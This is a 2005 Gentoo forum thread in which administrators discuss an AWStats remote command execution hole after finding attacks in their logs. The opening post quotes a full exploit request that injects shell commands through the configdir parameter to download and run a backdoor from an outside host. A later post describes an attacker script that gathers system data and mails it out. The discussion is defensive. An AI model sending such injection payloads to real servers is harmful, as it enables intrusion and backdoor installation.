# Awstats not secure ?

## eXess

I found this in my apache log :

```
201.9.252.72 - - [24/Feb/2005:19:32:18 +0100] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%0..;cd%20..;cd%20tmp;wget%20http://members.aol.com/cavaleirosb1/xpl/rootedoor;chmod%20777%20rootedoor;./rootedoor;echo%20;echo| HTTP/1.0" 200 687 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
```

Obviously this leads to launching the rootedoor trojan, which I found running in my process list and it evidently opened a port (8587) on my box. Fortunately this is behind a router running NAT so it shouldn't be too serious. Eventually, I'll reinstall the server this weekend (I had a couple other warnings these days)... 

So, 3 questions :

1. Is Awstats insecure? Obviously, Awstats.pl processed the commands in the configdir variable, so there must be a hole there. Is there a patch or should I just get rid of that bloody package ?

2. I'll need more security in the future. I recently activated open_basedir directive in my PHP.INI. It obviously failed. I know it is inefficient to chmod 666 the temp dirs, so I won't do that. I was wondering about safe_mode. Has anybody experience with this and can you tell me a bit more ? (pros and cons, what I should look after,...) ? 

3. I'll get grsecurity when reinstalling, ok. Considering it's a small home system with only a few external users (friends and relatives) and relatively few activity, do you think it's relatively safe to use just grsecurity and open_basedir, or should I add safe_mode, or is it merely not enough and should I change everything grounds up ?

Thank youuuu again dear community  :Wink: 

----------

## psi0nik

awstats versions 5.0-6.2 are vulnerable to a remote command execution exploit. this has been in the wild for at least 2-3 weeks, and you should definitely upgrade to 6.3. see http://awstats.sourceforge.net/ for further information.

----------

## eXess

Yes, I saw the information just after having posted this. However, upgrade should be done manually as the Portage ebuild is still at 6.3-r2. As I'd rather have as few manuallt installed packages on my system, I merely uninstalled it. I still use webalizer, which has no such risk. Rats! Awstats was so cool...  :Confused: 

As with every intrusion, I assume that, as the process was idle for about 24hrs (and I could kill it and it has not respawned since) and the install file was still in /tmp, the system has not been too much compromised. Well, the idea is that if the process had really been successful, it would have deleted all traces of itself, hmm? Maybe I'm being too optimistic. Anyway, I plan to reinstall the system shortly.

----------

## psi0nik

6.3-r2 indicates release 2 of the ebuild for awstats-6.3. installing this ebuild should get you a non-vulnerable awstats. although it's never possible to say 100%, you most likely don't need to worry too much about the proc that was running. it seems to be a backdoor/bindshell from my .5 seconds of googling it. at best, that gets the attacker a shell as apache (or whatever user you have apache configured to run as). assuming that your system was otherwise patched, and not vulnerable to any local privilege escalation exploits, you're *probably* okay.

----------

## eXess

Thanks psi0nik, that's exactly what I thought. Alas, Awstats 6.3-r2 is the version that was running at the moment the attack took place, so it definitely IS vulnerable  :Confused:  Anyway, I did not take any chances, and I'll still reinstall in a week. As I said, other warnings occured days before this one. Not anymore serious, but anyway... 

Anyone has information about safe_mode and other security measures ?

----------

## wjholden

My forum just got rooted -- two days after installing Awstats.  I'm going to password protect it and make it generally inaccessible, but I'm scared of this software, no matter how much I like it.  Be really careful using Awstats guys.  This is version 6.3-r2.

----------

## j-m

 :Exclamation:  Please file a bug for this if you are running the latest version available in portage tree. Don´t bother otherwise.

P.S. Could you wrap the quoted log entry in your first post? It is too long and breaks the whole layout of the page.

EDIT: I have filed the bug report, so please don´t file duplicates. But more information on this would be really usefull - if you have more details, please post your comments to https://bugs.gentoo.org/show_bug.cgi?id=83657Last edited by j-m on Tue Mar 01, 2005 11:34 am; edited 1 time in total

----------

## Koon

 *eXess wrote:*   

> Awstats 6.3-r2 is the version that was running at the moment the attack took place, so it definitely IS vulnerable

 

Running the secure version doesn't prevent the script kiddies to send HTTP queries to try to abuse it. The attack will show on the logs even with the secure version. That doesn't mean it succeeded. And the fact that it shows in the logs tend to prove that it didn't, otherwise he would have wiped them... Did you find a rootedoor file somewhere on your filesystem (preferably looking at it from a secure LiveCD) ?

 *destuxor wrote:*   

> My forum just got rooted -- two days after installing Awstats. I'm going to password protect it and make it generally inaccessible, but I'm scared of this software, no matter how much I like it. Be really careful using Awstats guys. This is version 6.3-r2.

 

That may be the recent phpBB hole, not AWstats... What were you running as forum software and version ?

-- 

Koon

Gentoo Linux Security

----------

## Koon

 *Koon wrote:*   

>  *eXess wrote:*   Awstats 6.3-r2 is the version that was running at the moment the attack took place, so it definitely IS vulnerable 
> 
> Running the secure version doesn't prevent the script kiddies to send HTTP queries to try to abuse it. The attack will show on the logs even with the secure version. That doesn't mean it succeeded. And the fact that it shows in the logs tend to prove that it didn't, otherwise he would have wiped them... Did you find a rootedoor file somewhere on your filesystem (preferably looking at it from a secure LiveCD) ?

 

I misread your post, sorry. You probably were running an affected version (<6.3-r2). Could you confirm ?

----------

## Koon

Oh man, I really should be sleeping. You were running 6.3-r2  :Smile: 

We'll investigate this, through https://bugs.gentoo.org/show_bug.cgi?id=83657

----------

## wjholden

Didn't expect a response like that...

Upon spending around 3 hours digging through logs and comparing filesizes in my forum's .php files it appears that what actually happened was a bug in phpBB appeared suddenly after a few weeks of running great, which just happened to occur the day after installing Awstats.

What happened was when you clicked Login in the forum you were redirected to paypal.com or microsoft.com.  I immediately assumed that some of my forum's .php files had been replaced by something containing a backdoor/redirect (rootkit for phpBB forum).  Looking in the directory I had forgotten to reset my permissions after editting some files in the /var/www/localhost/htdocs/ folder to 755 apache:apache; they were set to world-writable owned by different users.  This happened the day after installing Awstats so I quickly assumed that it was an insecurity in Awstats that had allowed what appeared to be a break-in.  I did find it highly unlikely that someone could break into my forum since it's password protected by Apache and employs SSL, so it's a fairly secure website.

It is actually a bug in phpBB and a fix is at http://www.phpbb.com/kb/article.php?article_id=83.  This bugfix is over a year old so I am shocked that it isn't fixed in the current version of phpBB, but following those directions has fixed the problem.

My forum was not rooted, but it looked like it.  The current version of Awstats is probably not hazardous as I feared.  I'm sorry if it looks like a hoax...it's a false alarm.  Like Jakub Moc says, "phpBB is another bug-infested webapp."  I apologize for the concerns I have aroused.  I will be password-protecting Awstats in the future, though.

Again, I apologize for this false alarm.  I don't know why phpBB crapped out all the sudden, but it appears to be completely unrelated to Awstats.  This is what happens when you speak before you research.

----------

## j-m

 *destuxor wrote:*   

> I will be password-protecting Awstats in the future, though.
> 
> 

 

*Phew* That was scary!  :Laughing: 

This patch could give you some inspiration to password-protecting AWStats. Hopefully is will be included in the next version. Just replace PVR with 6.3-r2 for the authentication method you will choose.

----------

## psi0nik

i do see that awstats 6.4 has been released, but they don't mention that 6.3 has any known security issues, at least on the main page. password protecting awstats takes about 5 seconds to make a .htaccess/.htpasswd.

----------

## wjholden

Thanks!  I'll install that as soon as I finish this damned Java project I'm working on.  Do you think it would be a good idea to change the name of the directory, so that rather than going to /awstats/awstats.pl through the webbrowser it'd be something else, like /sitestats/awstats.pl?  I know some applications break when you do this, so I guess I'll try it and post whether it works or not (I think I have to modify /etc/awstats/awstats.conf to do this).  Thanks for the support again!

----------

## j-m

I have this pointing to /stats, not /awstats and nothing broke so far...  :Smile: 

----------

## psi0nik

changing the directory defeinitely doesn't break anything. renaming the file, however, changes a bunch of stuff, due to awstats.pl referencing it's basename a lot. so, if you change it to, for example, webstats.pl, then it'll be looking for webstats.conf or webstats.$vhost.conf

----------

## chrismcf

I was actually watching my apache logs today and I saw a curious request for awstats.  Naturally, this put me on the alert.  Quick websearch later, yep, suckage! awstats is insecure.  Rooting through my apache logs, I have had several attempts on my server this way.  Everything looks ok, and as I understand it, you need a local exploit as well as this to gain root, but I will probably reinstall soon too.  I actually got a hold of the script they tried to run, this url was working a little while ago:

http://www.commraw.3x.ro/goinfo

All this does is collect some information about the system and mails it to the email address provided as the first arg. In this case, scanlog@gmail.com.  Fortunately, the mail program is not available on my box, so the mail didn't go out.  Evidently, this guys handle is ment0ru, and he is from Romania (well, he owns a domain there anyway), and he doesn't try to hide what he is up to.  I know more about him than he does about me   :Smile:   Well... hopefully...

Until I get some assurance awstats is fixed, it is blacklisted from my box  :Smile:   It is really handy though.

----------

